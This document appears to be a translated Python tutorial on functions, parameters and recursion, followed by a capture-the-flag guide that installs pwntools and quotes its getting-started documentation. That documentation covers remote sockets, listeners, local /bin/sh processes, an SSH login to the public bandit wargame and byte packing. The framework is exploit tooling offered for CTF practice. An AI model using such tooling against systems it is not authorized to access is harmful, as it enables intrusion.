>>> max(2, 3, 1, -5)
3
Data type conversions
Python's commonly used built-in functions also include data type conversion functions, such as int(), which converts other data types to integers:
>>> int('123')
123
>>> int(12.34)
12
>>> float('12.34')
12.34
>>> str(1.23)
'1.23'
>>> str(100)
'100'
>>> bool(1)
True
>>> bool('')
False
A function name is actually a reference to a function object, and it is possible to assign the function name to a variable, which is equivalent to giving the function an "alias".
>>> a = abs # Variable a points to the abs function
>>> a(-1) # So you can also call the abs function from a
1
Defining functions
In Python, you define a function with the def statement: write def, the function name, the parentheses, the parameters inside the parentheses, and a colon :, in that order. Then write the function body in an indented block; the result of the function is returned with the return statement.
Let's take a custom my_abs function that computes the absolute value as an example:
# -*- coding: utf-8 -*-
def my_abs(x):
    if x >= 0:
        return x
    else:
        return -x

print(my_abs(-99))
Please test it yourself by calling my_abs and checking whether the returned result is correct.
Note that when the statements in the function body are executed, the function ends as soon as a return statement is reached, and the result is returned. Thus, very complex logic can be implemented inside a function with conditionals and loops.
If there is no return statement, the function still returns a result when it finishes executing, but the result is None. return None can be abbreviated to return.
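The behaviour of return described above can be checked with a short sketch. The functions greet and first_negative are hypothetical helpers written only for this illustration.

```python
def greet(name):
    # No return statement: the function implicitly returns None.
    print('Hello,', name)

def first_negative(numbers):
    for n in numbers:
        if n < 0:
            return n    # leaves the function immediately
    return              # bare return, same as "return None"

result = greet('Bob')
print(result)                        # None
print(first_negative([3, -1, -7]))   # -1
print(first_negative([1, 2, 3]))     # None
```

Note that first_negative stops at -1 and never looks at -7, because the first return that is reached ends the call.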
When defining a function in the Python interactive environment, note that Python shows a ... prompt. When you finish the definition, press Enter twice to get back to the >>> prompt.
┌────────────────────────────────────────────────────────┐
│Command Prompt - python - □ x │
├────────────────────────────────────────────────────────┤
│>>> def my_abs(x): │
│... if x >= 0: │
│... return x │
│... else: │
│... return -x │
│... │
│>>> my_abs(-9) │
│9 │
│>>> _ │
│ │
│ │
└────────────────────────────────────────────────────────┘
If you have saved the definition of my_abs() in a file named abstest.py, you can start the Python interpreter in that file's directory and import the function with from abstest import my_abs. Note that abstest is the file name without the .py extension.
┌────────────────────────────────────────────────────────┐
│Command Prompt - python - □ x │
├────────────────────────────────────────────────────────┤
│>>> from abstest import my_abs │
│>>> my_abs(-9) │
│9 │
│>>> _ │
│ │
│ │
│ │
│ │
│ │
│ │
│ │
└────────────────────────────────────────────────────────┘
The usage of import is described in detail in the later section on modules.
Empty functions
If you want to define an empty function that does nothing, you can use the pass statement:
def nop():
    pass
The pass statement doesn't do anything, so what's the point? pass can be used as a placeholder: if you haven't figured out how to write the code for a function yet, you can put a pass there first so that the rest of the code can run.
pass can also be used in other statements, such as:
if age >= 18:
    pass
Without the pass, the code fails with a syntax error.
Parameter checking
When a function is called with the wrong number of arguments, the Python interpreter detects this automatically and raises a TypeError:
>>> my_abs(1, 2)
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: my_abs() takes 1 positional argument but 2 were given
But if the argument type is wrong, the Python interpreter can't check it for us. Compare my_abs with the built-in function abs:
>>> my_abs('A')
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "<stdin>", line 2, in my_abs
TypeError: unorderable types: str() >= int()
>>> abs('A')
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: bad operand type for abs(): 'str'
The built-in function abs checks its argument and reports a clear error when an improper one is passed in, while the my_abs we defined performs no check, so the error only surfaces in the if statement, with a different message than the one from abs. So this function definition is not good enough.
Let's modify the definition of my_abs to check the argument type and allow only integers and floating point numbers. The type check can be implemented with the built-in function isinstance():
def my_abs(x):
    if not isinstance(x, (int, float)):
        raise TypeError('bad operand type')
    if x >= 0:
        return x
    else:
        return -x
With parameter checking added, the function raises an error when an argument of the wrong type is passed in:
>>> my_abs('A')
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "<stdin>", line 3, in my_abs
TypeError: bad operand type
Error and exception handling will be covered later.
Returning multiple values
Can a function return more than one value? The answer is yes.
For example, in a game you often need to move from one point to another. Given the coordinates, the step length and the angle, you can calculate the new coordinates as follows:
import math

def move(x, y, step, angle=0):
    nx = x + step * math.cos(angle)
    ny = y - step * math.sin(angle)
    return nx, ny
The import math statement imports the math module, which lets the code that follows use sin, cos and other functions from that module.
We can then receive both return values at once:
>>> x, y = move(100, 100, 60, math.pi / 6)
>>> print(x, y)
151.96152422706632 70.0
But in fact this is only an illusion, and the Python function still returns a single value:
>>> r = move(100, 100, 60, math.pi / 6)
>>> print(r)
(151.96152422706632, 70.0)
So the return value is a tuple! Syntactically, the parentheses can be omitted when returning a tuple, and several variables can receive a tuple at once, each assigned the corresponding value by position. A Python function that returns multiple values is therefore really returning a single tuple, which is simply more convenient to write.
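The same tuple mechanism can be seen in a smaller sketch. The function min_max is a hypothetical example, not part of the original text.

```python
def min_max(numbers):
    """Return the smallest and largest items of a non-empty sequence."""
    return min(numbers), max(numbers)   # same as: return (min(numbers), max(numbers))

result = min_max([3, 1, 4, 1, 5])
print(type(result).__name__, result)    # tuple (1, 5)

lo, hi = min_max([3, 1, 4, 1, 5])       # unpack the tuple by position
print(lo, hi)                           # 1 5
```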
Summary
When defining a function, you need to decide on the function name and the number of parameters.
If necessary, you can first check the data types of the arguments.
return can be used anywhere inside the function body to return the result of the function.
If the function finishes executing without reaching a return statement, it automatically returns None.
A function can return multiple values at the same time, but what it actually returns is a tuple.
Parameters of a function
When defining a function, once we have fixed the names and positions of its parameters, the function's interface is complete. The caller only needs to know how to pass the right arguments and what value the function will return; the complex logic inside the function is encapsulated, and the caller doesn't need to understand it.
Python's function definitions are very simple, yet very flexible. In addition to ordinary mandatory parameters, you can also use default, variable, and keyword parameters, so that the interface defined by a function can handle complex arguments while also simplifying the caller's code.
Positional parameters
Let's start by writing a function that calculates x^2:
def power(x):
    return x * x
For the power(x) function, the parameter x is a positional parameter.
When we call the power function, we must pass in exactly one argument x:
>>> power(5)
25
>>> power(15)
225
Now, what if we want to calculate x^3? We could define another function, power3, but what if we want to calculate x^4, x^5, ...? We can't define an infinite number of functions.
It may have occurred to you that power(x) can be changed to power(x, n) to compute x^n:
def power(x, n):
    s = 1
    while n > 0:
        n = n - 1
        s = s * x
    return s
With the modified power(x, n) function, any nth power can be computed:
>>> power(5, 2)
25
>>> power(5, 3)
125
The modified power(x, n) function has two parameters, x and n, both of which are positional parameters. When the function is called, the two values passed in are assigned to x and n in order of position.
Default parameters
The new power(x, n) function definition is fine, but the old calling code now fails: because we added a parameter, the old code is missing an argument and can no longer call the function:
>>> power(5)
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: power() missing 1 required positional argument: 'n'
Python's error message is clear: the call to power() is missing the positional argument n.
This is where default parameters come into play. Since we often calculate x^2, it is perfectly reasonable to set the default value of the second parameter, n, to 2:
def power(x, n=2):
    s = 1
    while n > 0:
        n = n - 1
        s = s * x
    return s
Thus, calling power(5) is equivalent to calling power(5, 2):
>>> power(5)
25
>>> power(5, 2)
25
For any other value of n, n must be passed explicitly, as in power(5, 3).
As the example above shows, default parameters can simplify function calls. When setting default parameters, there are a few things to keep in mind.
First, mandatory parameters must come first and default parameters after them, otherwise the Python interpreter reports an error (think about why default parameters can't be placed in front of mandatory parameters).
Second, how to choose the default parameters.
When a function has more than one parameter, put the parameters that vary a lot first and the parameters that vary little last. The parameters that vary little can then be given default values.
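The ordering rule can be checked without crashing the script by compiling a deliberately wrong definition from a string. This is only a sketch: the string bad_definition and the flag rejected are illustrative names, and the exact wording of the error message differs between Python versions, so it is printed rather than assumed.

```python
# A definition that puts a default parameter before a mandatory one.
bad_definition = "def power(n=2, x):\n    return x ** n\n"

rejected = False
try:
    compile(bad_definition, '<example>', 'exec')
except SyntaxError as err:
    rejected = True
    print('SyntaxError:', err.msg)

# The accepted order: mandatory parameter first, default parameter second.
def power(x, n=2):
    return x ** n

print(power(5), power(5, 3))   # 25 125
```

One way to see why the rule exists: with the default parameter first, a call such as power(5) would be ambiguous, since 5 could be meant for either n or x.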
What are the benefits of using default parameters? The biggest benefit is that it reduces the difficulty of calling the function.
For example, let's write a function that registers a first-grade student and takes two parameters, name and gender:
def enroll(name, gender):
    print('name:', name)
    print('gender:', gender)
The enroll() function can then be called with just two arguments:
>>> enroll('Sarah', 'F')
name: Sarah
gender: F
What if I want to continue passing in information such as age, city, etc.? This would make calling the function much more complicated.
We can set age and city as default parameters.
def enroll(name, gender, age=6, city='Beijing'):
    print('name:', name)
    print('gender:', gender)
    print('age:', age)
    print('city:', city)
In this way, most students don't need to provide their age and city when registering; only the two mandatory arguments are required:
>>> enroll('Sarah', 'F')
name: Sarah
gender: F
age: 6
city: Beijing
Only students who differ from the defaults need to provide additional information:
enroll('Bob', 'M', 7)
enroll('Adam', 'M', city='Tianjin')
As you can see, default parameters make functions easier to call, and when a more complex call is needed, more arguments can be passed. Whether the call is simple or complex, only one function needs to be defined.
When there are multiple default parameters, the call can provide them in order, as in enroll('Bob', 'M', 7): in addition to name and gender, the last argument is applied to the parameter age, and the city parameter, since it is not provided, still uses its default value.
It is also possible to provide only some of the default parameters, out of order. In that case you need to write the parameter name. For example, calling enroll('Adam', 'M', city='Tianjin') means that the city parameter uses the value passed in, while the other default parameters keep their default values.
Default parameters are useful, but they can trip you up if used improperly. Their biggest pitfall is demonstrated below.
First define a function that takes a list, appends 'END' to it, and returns it:
def add_end(L=[]):
    L.append('END')
    return L
When you call it normally, the result seems good:
>>> add_end([1, 2, 3])
[1, 2, 3, 'END']
>>> add_end(['x', 'y', 'z'])
['x', 'y', 'z', 'END']
When you call with the default parameters, the result is also correct at first:
>>> add_end()
['END']
However, when add_end() is called again, the result is wrong:
>>> add_end()
['END', 'END']
>>> add_end()
['END', 'END', 'END']
Many beginners are puzzled: the default argument is [], yet the function seems to "remember" the list from the previous call, including the 'END' that was added to it.
The reason is as follows.
The value of the default parameter L, i.e. [], is computed once, when the function is defined. The default parameter L is a variable that points to that one list object. If a call changes the contents of the object that L points to, the default value has different contents on the next call and is no longer the [] it was when the function was defined.
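The single shared default object can be observed directly through the function's __defaults__ attribute, which holds the default values computed at definition time. The names first and second are used only for this sketch.

```python
def add_end(L=[]):
    L.append('END')
    return L

print(add_end.__defaults__)   # ([],)
first = add_end()
print(add_end.__defaults__)   # (['END'],)
second = add_end()
print(first is second)        # True: both calls returned the same list object
print(add_end.__defaults__)   # (['END', 'END'],)
```

Both calls return the very list stored in __defaults__, which is why the appended items accumulate.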
One thing to keep in mind when defining default parameters: they must point to immutable objects!
To fix the example above, we can use the immutable object None:
def add_end(L=None):
    if L is None:
        L = []
    L.append('END')
    return L
Now, no matter how many times it is called, there will be no problem:
>>> add_end()
['END']
>>> add_end()
['END']
Why are there immutable objects such as str and None? Because once an immutable object is created, the data inside it cannot be modified, which reduces errors caused by modifying data. In addition, because the object cannot change, it can be read concurrently in a multitasking environment without any locking. When writing a program, if an object can be designed as immutable, try to design it that way.
Variable arguments
Variable parameters can also be defined in Python functions. As the name implies, the number of arguments passed in is variable: it can be 1, 2, or any number, including 0.
Let's take a math problem as an example: given a set of numbers a, b, c, ..., calculate a^2 + b^2 + c^2 + ....
To define this function, we must decide on the input parameters. Since the number of arguments is not fixed, the first idea is to pass a, b, c, ... in as a list or tuple, so that the function can be defined as follows:
def calc(numbers):
    sum = 0
    for n in numbers:
        sum = sum + n * n
    return sum
But to call it, a list or tuple needs to be assembled first:
>>> calc([1, 2, 3])
14
>>> calc((1, 3, 5, 7))
84
If variable parameters are utilized, the way the function is called can be simplified as follows.
>>> calc(1, 2, 3)
14
>>> calc(1, 3, 5, 7)
84
So, we change the parameter of the function to a variable parameter:
def calc(*numbers):
    sum = 0
    for n in numbers:
        sum = sum + n * n
    return sum
Compared with a list or tuple parameter, defining a variable parameter only requires adding a * in front of the parameter name. Inside the function, numbers is received as a tuple, so the function body stays exactly the same. However, the function can now be called with any number of arguments, including 0:
>>> calc(1, 2)
5
>>> calc()
0
What if you already have a list or tuple and want to call a function that takes a variable parameter? You can do this:
>>> nums = [1, 2, 3]
>>> calc(nums[0], nums[1], nums[2])
14
This is too cumbersome, so Python lets you put a * in front of a list or tuple to pass its elements as variable arguments:
>>> nums = [1, 2, 3]
>>> calc(*nums)
14
*nums means that all elements of the list nums are passed in as variable arguments. This notation is quite useful and very common.
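A short sketch of the * notation at the call site follows. It also shows that unpacked elements can be mixed with ordinary arguments and that the same notation works with built-in functions such as max(). The variable names are illustrative, and the accumulator is called total here to avoid shadowing the built-in sum().

```python
def calc(*numbers):
    total = 0
    for n in numbers:
        total = total + n * n
    return total

nums_list = [1, 2, 3]
nums_tuple = (1, 3, 5, 7)

print(calc(*nums_list))         # 14
print(calc(*nums_tuple))        # 84
print(calc(0, *nums_list, 4))   # 30
print(max(*nums_tuple))         # 7
```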
Keyword arguments
Variable parameters allow you to pass in zero or more arguments, which are automatically assembled into a tuple when the function is called. Keyword parameters allow you to pass in zero or more arguments with parameter names, which are automatically assembled into a dict inside the function. See the example:
def person(name, age, **kw):
    print('name:', name, 'age:', age, 'other:', kw)
In addition to the mandatory parameters name and age, the function person accepts the keyword parameter kw. When calling this function, you can pass in only the mandatory arguments:
>>> person('Michael', 30)
name: Michael age: 30 other: {}
You can also pass in any number of keyword arguments:
>>> person('Bob', 35, city='Beijing')
name: Bob age: 35 other: {'city': 'Beijing'}
>>> person('Adam', 45, gender='M', job='Engineer')
name: Adam age: 45 other: {'gender': 'M', 'job': 'Engineer'}
What are keyword parameters good for? They extend what a function can do. For example, in the person function we are guaranteed to receive the two parameters name and age, but if the caller wants to provide more, we can receive those as well. Imagine you are writing a user registration feature in which everything is optional except the user name and age; defining the function with keyword parameters satisfies that requirement.
As with variable parameters, you can also assemble a dict first and then pass its items in as keyword arguments:
>>> extra = {'city': 'Beijing', 'job': 'Engineer'}
>>> person('Jack', 24, city=extra['city'], job=extra['job'])
name: Jack age: 24 other: {'city': 'Beijing', 'job': 'Engineer'}
Of course, the cumbersome call above can be simplified:
>>> extra = {'city': 'Beijing', 'job': 'Engineer'}
>>> person('Jack', 24, **extra)
name: Jack age: 24 other: {'city': 'Beijing', 'job': 'Engineer'}
**extra means that all key-value pairs of the dict extra are passed as keyword arguments into the function's **kw parameter, so kw receives a dict. Note that the dict kw receives is a copy of extra; changes to kw do not affect extra outside the function.
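The copy behaviour can be verified with a small sketch. The function tag_person and the key 'checked' are hypothetical and exist only for this illustration.

```python
def tag_person(name, **kw):
    kw['checked'] = True        # modifies only the function's own dict
    return kw

extra = {'city': 'Beijing', 'job': 'Engineer'}
received = tag_person('Jack', **extra)

print(received)            # {'city': 'Beijing', 'job': 'Engineer', 'checked': True}
print(extra)               # {'city': 'Beijing', 'job': 'Engineer'}
print(received is extra)   # False
```

The copy is a new dict, but the values in it are the same objects as in extra, so a mutable value such as a list would still be shared between the two.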
Named keyword arguments
With keyword parameters, the caller of a function can pass in any keyword arguments without restriction. Exactly what was passed in has to be checked inside the function via kw.
Still using the person() function as an example, suppose we want to check whether city and job arguments were passed:
def person(name, age, **kw):
    if 'city' in kw:
        # A city argument was passed
        pass
    if 'job' in kw:
        # A job argument was passed
        pass
    print('name:', name, 'age:', age, 'other:', kw)
However, the caller can still pass in unrestricted keyword arguments.
>>> person('Jack', 24, city='Beijing', addr='Chaoyang', zipcode=123456)
If you want to restrict the names of the keyword arguments, you can use named keyword parameters, for example to accept only city and job as keyword arguments. A function defined this way looks as follows:
def person(name, age, *, city, job):
    print(name, age, city, job)
Unlike the keyword parameter **kw, named keyword parameters require a special separator *; the parameters following * are treated as named keyword parameters.
It is called as follows:
>>> person('Jack', 24, city='Beijing', job='Engineer')
Jack 24 Beijing Engineer
If the function definition already has a variable parameter, the named keyword parameters that follow it no longer need the special separator *:
def person(name, age, *args, city, job):
    print(name, age, args, city, job)
Unlike positional arguments, named keyword arguments must be passed with their parameter names. If the names are omitted, the call raises an error:
>>> person('Jack', 24, 'Beijing', 'Engineer')
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: person() missing 2 required keyword-only arguments: 'city' and 'job'
Because the parameter names city and job are missing in the call, the Python interpreter treats the first two arguments as positional arguments and passes the last two to *args, so the required named keyword arguments are missing and the call fails.
Named keyword parameters can have default values, which simplifies the call:
def person(name, age, *, city='Beijing', job):
    print(name, age, city, job)
Since the named keyword parameter city has a default value, the function can be called without passing city:
>>> person('Jack', 24, job='Engineer')
Jack 24 Beijing Engineer
When using named keyword parameters, take special care to add * as the separator if there is no variable parameter. If * is missing, the Python interpreter cannot tell positional parameters and named keyword parameters apart:
def person(name, age, city, job):
    # Without *, city and job are treated as positional parameters
    pass
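The effect of the * separator can be sketched as follows. This variant of person returns a string instead of printing, purely so the result is easy to inspect; the flag positional_rejected is an illustrative name, and the exact text of the TypeError depends on the Python version, so it is printed rather than assumed.

```python
def person(name, age, *, city='Beijing', job):
    return '%s %s %s %s' % (name, age, city, job)

print(person('Jack', 24, job='Engineer'))                   # Jack 24 Beijing Engineer
print(person('Jack', 24, job='Engineer', city='Tianjin'))   # Jack 24 Tianjin Engineer

positional_rejected = False
try:
    # city and job passed by position: not allowed after the * separator
    person('Jack', 24, 'Tianjin', 'Engineer')
except TypeError as err:
    positional_rejected = True
    print('TypeError:', err)
```

Because city and job can only be passed by name, the order in which the caller writes them does not matter.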
Parameter combinations
To define functions in Python, you can use mandatory parameters, default parameters, variable parameters, keyword parameters, and named keyword parameters, all five of which can be used in combination. However, please note that the order of parameter definition must be: mandatory parameters, default parameters, variable parameters, named keyword parameters, and keyword parameters.
For example, define functions that use several of these kinds of parameters:
def f1(a, b, c=0, *args, **kw):
    print('a =', a, 'b =', b, 'c =', c, 'args =', args, 'kw =', kw)

def f2(a, b, c=0, *, d, **kw):
    print('a =', a, 'b =', b, 'c =', c, 'd =', d, 'kw =', kw)
When a function is called, the Python interpreter automatically binds the arguments to the corresponding parameters according to their positions and names:
>>> f1(1, 2)
a = 1 b = 2 c = 0 args = () kw = {}
>>> f1(1, 2, c=3)
a = 1 b = 2 c = 3 args = () kw = {}
>>> f1(1, 2, 3, 'a', 'b')
a = 1 b = 2 c = 3 args = ('a', 'b') kw = {}
>>> f1(1, 2, 3, 'a', 'b', x=99)
a = 1 b = 2 c = 3 args = ('a', 'b') kw = {'x': 99}
>>> f2(1, 2, d=99, ext=None)
a = 1 b = 2 c = 0 d = 99 kw = {'ext': None}
Most remarkably, you can also call the functions above with a tuple and a dict:
>>> args = (1, 2, 3, 4)
>>> kw = {'d': 99, 'x': '#'}
>>> f1(*args, **kw)
a = 1 b = 2 c = 3 args = (4,) kw = {'d': 99, 'x': '#'}
>>> args = (1, 2, 3)
>>> kw = {'d': 88, 'x': '#'}
>>> f2(*args, **kw)
a = 1 b = 2 c = 3 d = 88 kw = {'x': '#'}
So any function can be called in the form func(*args, **kw), regardless of how its parameters are defined.
Although all 5 kinds of parameters can be combined, do not use too many of them at the same time, otherwise the function's interface becomes hard to understand.
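One common use of the func(*args, **kw) form is a helper that forwards whatever it receives to another function. The sketch below assumes a hypothetical helper named call_logged; it is not part of Python or of the original text.

```python
def call_logged(func, *args, **kw):
    """Call func with whatever arguments were given and report the call."""
    print('calling', func.__name__, 'with', args, kw)
    return func(*args, **kw)

def power(x, n=2):
    return x ** n

print(call_logged(power, 5))        # returns 25
print(call_logged(power, 5, n=3))   # returns 125
print(call_logged(max, 2, 3, 1))    # returns 3
```

The helper works for power and for the built-in max alike, because it does not need to know how their parameters are defined.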
Summary
Python's functions have a very flexible parameter syntax, allowing both simple calls and very complex arguments to be passed in.
Default parameters should point to immutable objects; with a mutable object, the program will run with a logic error!
Note the syntax for defining variable and keyword parameters:
*args is a variable parameter; args receives a tuple.
**kw is a keyword parameter; kw receives a dict.
Also note the syntax for passing variable and keyword arguments when calling a function:
Variable arguments can be passed either directly, func(1, 2, 3), or by assembling a list or tuple first and passing it via *args: func(*(1, 2, 3)).
Keyword arguments can be passed either directly, func(a=1, b=2), or by assembling a dict first and passing it via **kw: func(**{'a': 1, 'b': 2}).
Using *args and **kw is the customary Python style; other parameter names can be used, but it is better to stick to the convention.
Named keyword parameters are intended to restrict the parameter names the caller can pass in, while still allowing default values.
When defining named keyword parameters without a variable parameter, don't forget to write the separator *, otherwise they are defined as positional parameters.
Recursive functions
Inside a function, other functions can be called. If a function calls itself, it is a recursive function.
As an example, let's calculate the factorial n! = 1 x 2 x 3 x ... x n, represented by the function fact(n). It can be seen that:
fact(n) = n! = 1 x 2 x 3 x ... x (n-1) x n = (n-1)! x n = fact(n-1) x n
So fact(n) can be expressed as n x fact(n-1), with special treatment required only for n = 1.
Thus, fact(n) is written recursively as:
def fact(n):
    if n == 1:
        return 1
    return n * fact(n - 1)
The above is a recursive function. Try:
>>> fact(1)
1
>>> fact(5)
120
>>> fact(100)
93326215443944152681699238856266700490715968264381621468592963895217599993229915608941463976156518286253697920827223758251185210916864000000000000000000000000
If we calculate fact(5), the computation proceeds according to the function definition as follows:
===> fact(5)
===> 5 * fact(4)
===> 5 * (4 * fact(3))
===> 5 * (4 * (3 * fact(2)))
===> 5 * (4 * (3 * (2 * fact(1))))
===> 5 * (4 * (3 * (2 * 1)))
===> 5 * (4 * (3 * 2))
===> 5 * (4 * 6)
===> 5 * 24
===> 120
Recursive functions have the advantage of being simple to define and logically clear. In theory, every recursive function can be rewritten as a loop, but the logic of the loop is often not as clear as the recursion.
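For comparison, here is a minimal sketch of the factorial written as a loop. The name fact_loop is an assumption made for this illustration.

```python
def fact_loop(n):
    """Compute n! for n >= 1 with a loop instead of recursion."""
    product = 1
    for k in range(2, n + 1):
        product = product * k
    return product

print(fact_loop(1))                 # 1
print(fact_loop(5))                 # 120
print(len(str(fact_loop(1000))))    # 2568 digits
```

The loop makes only one function call no matter how large n is, at the cost of managing the running product explicitly.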
Recursive functions must be used with care to prevent stack overflow. In computers, function calls are implemented with a data structure called a stack. Each time a function call is entered, a stack frame is pushed onto the stack, and each time a function returns, a stack frame is popped. Since the size of the stack is limited, too many nested recursive calls cause the stack to overflow. Try fact(1000):
>>> fact(1000)
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "<stdin>", line 4, in fact
...
File "<stdin>", line 4, in fact
RuntimeError: maximum recursion depth exceeded in comparison
The way to avoid stack overflow in recursive calls is tail-call optimization. In fact, tail recursion has the same effect as a loop, so a loop can be thought of as a special kind of tail-recursive function.
Tail recursion means that the function calls itself as the very last step when it returns, and the return statement contains nothing but that call. This lets a compiler or interpreter optimize the tail recursion so that, no matter how many times the function calls itself, it occupies only one stack frame and no stack overflow occurs.
The fact(n) function above is not tail recursive, because return n * fact(n - 1) performs a multiplication after the recursive call returns. Converting it to tail-recursive form takes a little more code, mainly to pass the product accumulated at each step into the recursive call:
def fact(n):
    return fact_iter(n, 1)

def fact_iter(num, product):
    if num == 1:
        return product
    return fact_iter(num - 1, num * product)
As you can see, return fact_iter(num - 1, num * product) returns only the result of the recursive call itself. num - 1 and num * product are computed before the call is made and do not affect it.
The call fact(5), which corresponds to fact_iter(5, 1), proceeds as follows:
===> fact_iter(5, 1)
===> fact_iter(4, 5)
===> fact_iter(3, 20)
===> fact_iter(2, 60)
===> fact_iter(1, 120)
===> 120
With tail-recursive calls, the stack does not grow if the optimization is performed, so no matter how many calls are made, the stack does not overflow.
Unfortunately, most programming languages do not optimize tail recursion, and neither does the Python interpreter, so even if you rewrite the fact(n) function above in tail-recursive form, it still results in a stack overflow.
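This can be checked with a short sketch that calls the tail-recursive version deeper than the interpreter's recursion limit. It assumes Python 3.5 or later, where the error is reported as RecursionError (a subclass of RuntimeError); the flag overflowed is an illustrative name.

```python
import sys

def fact_iter(num, product):
    if num == 1:
        return product
    return fact_iter(num - 1, num * product)

limit = sys.getrecursionlimit()
print('recursion limit:', limit)

try:
    fact_iter(limit + 100, 1)   # needs more nested calls than the limit allows
    overflowed = False
except RecursionError:
    overflowed = True

print('overflowed:', overflowed)
```

Even though every call is in tail position, each one still gets its own stack frame, so the limit is reached just as with the ordinary recursive version.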
Summary
The advantage of using recursive functions is that the logic is simple and clear, and the disadvantage is that calls that are too deep can lead to stack overflow.
Languages optimized for tail recursion can prevent stack overflows by tail recursion. Tail recursion is in fact equivalent to looping, and programming languages that don't have looping statements can only implement loops via tail recursion.
Python's standard interpreter does not optimize tail recursion, so any sufficiently deep recursion runs into the stack overflow problem.
Python Programming Quick Guide - CTF Related
https://yulizi123.github.io/tutorials/python-basic/basic/
https://docs.python.org/3/
https://docs.pwntools.com/en/stable/
Module installation
There are many ways to install external modules, and the form of installation varies from system to system. Installing Python packages on Windows, for example, might even kill you. Haha.
What is an external module?
An external module is what you use when you import something into a Python script.
import numpy as np
import matplotlib.pyplot as plt
Numpy and matplotlib are both external modules that need to be installed. They are not part of python's own modules.
Installing Numpy
For example, there are many ways to install modules for scientific operations, such as numpy. On Windows, the easiest way is to install Anaconda, which has many necessary external modules. Install one, and save yourself the trouble of installing others.
However, I want to talk about downloading the installation package and installing it on Windows. For example, on the Numpy installer website, you can find various versions of numpy.
In NumPy 1.10.2, we can find installers for Windows, but no Windows installers have been added to the new version yet. Then choose the appropriate "exe" installer for your system and python version. Download and install.
If you are on macOS or Linux, external modules are much easier to install: typing a single command into the Terminal is enough. Windows seems to need some special setup to do the same thing; you may want to look that up.
You can then install a module with a command of this form:
$ pip install <name of the module you want>
For example
$ pip install numpy # This is for the python2+ version
$ pip3 install numpy # This is for the python3+ version
Updating external modules
Updating external modules with pip is very simple. Just type the following command into the Terminal. The -U option is short for --upgrade.
$ pip install -U numpy # This is for the python2+ version
$ pip3 install -U numpy # This is for the python3+ version
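After installing or updating, one way to check from Python whether a module can be imported is the standard library's importlib.util.find_spec. The helper is_installed below is a hypothetical convenience function written for this sketch.

```python
import importlib.util

def is_installed(module_name):
    """Return True if a top-level module can be found for import."""
    return importlib.util.find_spec(module_name) is not None

# math ships with Python; numpy and pwn are present only if they were installed.
for name in ('math', 'numpy', 'pwn'):
    print(name, 'installed' if is_installed(name) else 'missing')
```

This only reports whether the module can be found by the interpreter that runs the script, which may differ from the interpreter that pip installed into.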
pwntools
pwntools is a CTF framework and exploit development library. Written in Python, it is designed for rapid prototyping and development, and intended to make exploit writing as simple as possible.
The primary location for this documentation is docs.pwntools.com, which uses readthedocs. It comes in three primary flavors:
Installation
Pwntools is best supported on 64-bit Ubuntu LTS releases (14.04, 16.04, 18.04, and 20.04). Most functionality should work on any Posix-like distribution (Debian, Arch, FreeBSD, OSX, etc.).
Prerequisites
To get the most out of pwntools, you should install the following system libraries.
- Binutils
- Python Development Headers
Released Version
pwntools is available as a pip package for both Python2 and Python3.
Python3
$ apt-get update
$ apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential
$ python3 -m pip install --upgrade pip
$ python3 -m pip install --upgrade pwntools
Python2 (Deprecated)
NOTE: Pwntools maintainers STRONGLY recommend using Python3 for all future Pwntools-based scripts and projects.
Additionally, due to pip dropping support for Python2, a specific version of pip must be installed.
$ apt-get update
$ apt-get install python python-pip python-dev git libssl-dev libffi-dev build-essential
$ python2 -m pip install --upgrade pip==20.3.4
$ python2 -m pip install --upgrade pwntools
Command-Line Tools
When installed with sudo, the above commands will install Pwntools' command-line tools to somewhere like /usr/bin.
However, if you run as an unprivileged user, you may see a warning that the scripts were installed in a directory that is not on PATH.
Follow the instructions listed and add ~/.local/bin to your $PATH environment variable.
Development
If you are hacking on Pwntools locally, you’ll want to do something like this:
$ git clone https://github.com/Gallopsled/pwntools
$ pip install --upgrade --editable ./pwntools
Getting Started
To get your feet wet with pwntools, let’s first go through a few examples.
When writing exploits, pwntools generally follows the “kitchen sink” approach.
>>> from pwn import *
This imports a lot of functionality into the global namespace. You can now assemble, disassemble, pack, unpack, and many other things with a single function.
A full list of everything that is imported is available in the documentation page titled "from pwn import *".
Tutorials
A series of tutorials for Pwntools exists online, at https://github.com/Gallopsled/pwntools-tutorial#readme
Making Connections
You need to talk to the challenge binary in order to pwn it, right? pwntools makes this stupid simple with its pwnlib.tubes module.
This exposes a standard interface to talk to processes, sockets, serial ports, and all manner of things, along with some nifty helpers for common tasks. For example, remote connections via pwnlib.tubes.remote.
>>> conn = remote('ftp.ubuntu.com',21)
>>> conn.recvline() # doctest: +ELLIPSIS
b'220 ...'
>>> conn.send(b'USER anonymous\r\n')
>>> conn.recvuntil(b' ', drop=True)
b'331'
>>> conn.recvline()
b'Please specify the password.\r\n'
>>> conn.close()
It’s also easy to spin up a listener
>>> l = listen()
>>> r = remote('localhost', l.lport)
>>> c = l.wait_for_connection()
>>> r.send(b'hello')
>>> c.recv()
b'hello'
Interacting with processes is easy thanks to pwnlib.tubes.process.
>>> sh = process('/bin/sh')
>>> sh.sendline(b'sleep 3; echo hello world;')
>>> sh.recvline(timeout=1)
b''
>>> sh.recvline(timeout=5)
b'hello world\n'
>>> sh.close()
Not only can you interact with processes programmatically, but you can also hand control to your terminal and interact with them directly.
>>> sh.interactive() # doctest: +SKIP
$ whoami
user
There's even an SSH module, pwnlib.tubes.ssh, for when you've got to SSH into a box to perform a local/setuid exploit. You can quickly spawn processes and grab the output, or spawn a process and interact with it like a process tube.
>>> shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220)
>>> shell['whoami']
b'bandit0'
>>> shell.download_file('/etc/motd')
>>> sh = shell.run('sh')
>>> sh.sendline(b'sleep 3; echo hello world;')
>>> sh.recvline(timeout=1)
b''
>>> sh.recvline(timeout=5)
b'hello world\n'
>>> shell.close()
Packing Integers
A common task for exploit-writing is converting between integers as Python sees them, and their representation as a sequence of bytes. Usually, folks resort to the built-in struct module.
pwntools makes this easier with pwnlib.util.packing. No more remembering unpacking codes, and littering your code with helper routines.
>>> import struct
>>> p32(0xdeadbeef) == struct.pack('I', 0xdeadbeef)
True
